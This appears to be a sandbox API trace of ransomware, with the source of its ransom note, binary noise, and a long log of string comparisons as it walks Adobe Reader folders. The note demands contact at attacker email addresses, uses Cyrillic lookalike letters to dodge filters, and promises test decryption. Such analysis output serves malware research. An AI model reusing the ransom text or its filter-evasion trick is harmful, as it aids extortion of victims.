pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\np¿WD÷\x0fe^`Ì!II\x05\x8aUá³\x81Í|\x86e\x12 cG®n&lhkô\x09mË\x05\x9fös)$\x0bsã\x9d\x7fÉ\rý)sdÁ\x1bs0\x19­­Ê4ñAmÈ\x9b/Á\x86¶ó\x92\r\x7fËõ\x1aH\x985Z¾»}\"}Î4\x0e<,\\\x92 Ü3h¬bÖ|ÕÜ\x04õw\x16Æ\x87>²§Û3ÿPH\x03û¥g·nïß\x04¯Â#5c\x03ay\x0c$ç¨\x17ïWæ¼Ñù\x021+Ùv\x05ÌW.#\x8cJÈ\x99Ú°", lpUsedDefaultChar=0x0) returned 7247 [0079.027] WriteFile (in: hFile=0x1f0, lpBuffer=0x25ad0d8*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x25ad0d8*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0079.028] CloseHandle (hObject=0x1f0) returned 1 [0079.029] Sleep (dwMilliseconds=0x3e8) [0081.127] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\", cchCount2=61) returned 2 [0081.127] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\", cchCount2=61) returned 1 [0081.127] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\", cchCount2=61) returned 1 [0081.127] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\", cchCount2=61) returned 2 [0081.128] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\Services\\", cchCount2=70) returned 1 [0081.128] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\Services\\", cchCount2=70) returned 1 [0081.128] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Javascripts\\", cchCount2=60) returned 3 [0081.128] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Javascripts\\", cchCount2=60) returned 3 [0081.128] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CZE\\", cchCount2=58) returned 3 [0081.128] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Javascripts\\", cchCount1=60, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CZE\\", cchCount2=58) returned 1 [0081.128] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\RUM\\", cchCount2=58) returned 3 [0081.128] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Javascripts\\", cchCount1=60, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\RUM\\", cchCount2=58) returned 1 [0081.128] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CZE\\", cchCount1=58, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\RUM\\", cchCount2=58) returned 1 [0081.128] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\RUM\\", cchCount1=58, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SUO\\", cchCount2=58) returned 1 [0081.128] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SUO\\", cchCount2=58) returned 3 [0081.128] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SUO\\", cchCount2=58) returned 3 [0081.128] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SUO\\", cchCount1=58, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\", cchCount2=61) returned 1 [0081.128] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\", cchCount2=61) returned 3 [0081.128] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\", cchCount2=61) returned 2 [0081.129] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SUO\\", cchCount1=58, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\", cchCount2=61) returned 1 [0081.129] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\", cchCount2=61) returned 3 [0081.129] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\", cchCount2=61) returned 2 [0081.129] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SUO\\", cchCount1=58, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\", cchCount2=61) returned 1 [0081.129] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\", cchCount2=61) returned 3 [0081.129] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\", cchCount2=61) returned 2 [0081.129] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SUO\\", cchCount1=58, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\", cchCount2=61) returned 1 [0081.129] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\", cchCount2=61) returned 3 [0081.129] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\", cchCount2=61) returned 2 [0081.129] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SUO\\", cchCount1=58, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\", cchCount2=61) returned 1 [0081.129] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\", cchCount2=61) returned 2 [0081.129] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SUO\\", cchCount1=58, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\", cchCount2=61) returned 1 [0081.129] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\", cchCount2=61) returned 3 [0081.130] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\", cchCount2=61) returned 2 [0081.130] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SUO\\", cchCount1=58, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\", cchCount2=61) returned 1 [0081.130] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\", cchCount2=61) returned 3 [0081.130] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\", cchCount2=61) returned 2 [0081.130] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SUO\\", cchCount1=58, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\", cchCount2=61) returned 1 [0081.130] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\", cchCount2=61) returned 3 [0081.130] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\", cchCount2=61) returned 2 [0081.130] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SUO\\", cchCount1=58, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\", cchCount2=61) returned 1 [0081.130] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\", cchCount2=61) returned 2 [0081.130] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SUO\\", cchCount1=58, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchCount2=61) returned 1 [0081.130] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchCount2=61) returned 1 [0081.130] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\Services\\", cchCount1=70, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchCount2=61) returned 1 [0081.130] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SUO\\", cchCount1=58, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\", cchCount2=61) returned 1 [0081.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\", cchCount2=61) returned 2 [0081.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SUO\\", cchCount1=58, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\", cchCount2=61) returned 1 [0081.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\", cchCount2=61) returned 2 [0081.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SUO\\", cchCount1=58, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\", cchCount2=61) returned 1 [0081.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\", cchCount2=61) returned 2 [0081.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SUO\\", cchCount1=58, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\", cchCount2=61) returned 1 [0081.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\", cchCount2=61) returned 2 [0081.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SUO\\", cchCount1=58, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\ESP\\", cchCount2=58) returned 3 [0081.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CZE\\", cchCount1=58, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\ESP\\", cchCount2=58) returned 1 [0081.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\RUM\\", cchCount1=58, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\ESP\\", cchCount2=58) returned 3 [0081.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SUO\\", cchCount1=58, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\Services\\", cchCount2=70) returned 1 [0081.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\Services\\", cchCount2=70) returned 1 [0081.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\Services\\", cchCount1=70, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\Services\\", cchCount2=70) returned 2 [0081.131] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SUO\\", cchCount1=58, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchCount2=61) returned 1 [0081.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchCount2=61) returned 1 [0081.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\Services\\", cchCount1=70, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchCount2=61) returned 1 [0081.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchCount2=61) returned 2 [0081.132] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SUO\\", cchCount1=58, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\HUN\\", cchCount2=58) returned 3 [0081.132] 